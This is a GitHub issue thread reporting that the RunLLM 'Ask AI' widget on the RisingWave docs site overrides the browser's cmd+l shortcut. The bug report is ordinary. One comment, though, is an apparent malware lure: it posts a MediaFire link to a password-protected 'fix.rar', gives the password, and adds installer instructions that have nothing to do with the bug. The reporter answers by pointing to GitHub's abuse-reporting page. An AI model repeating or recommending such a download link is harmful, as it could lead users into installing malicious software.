### ISSUE TITLE
Bug: RunLLM overrides browser keybindings on docs site

### ISSUE THREAD

**Issue by jshasteen-artera** [risingwavelabs/risingwave-docs-legacy#2515]
### Where's the bug?

https://docs.risingwave.com/docs

### Describe the bug

cmd+l is the browser-native shortcut for jumping to the address bar on multiple browsers (brave, chrome, firefox, safari)

RunLLM overrides cmd+l to open its Ask AI modal.

Please do not override browser-native keyboard shortcuts, they break peoples' workflows.

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jshasteen-artera** [comment]
https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam#reporting-a-comment 
![Screenshot 2024-08-26 at 10 35 20 AM](https://github.com/user-attachments/assets/e4c3c39e-c2ce-4821-9e8a-deec270642fb)
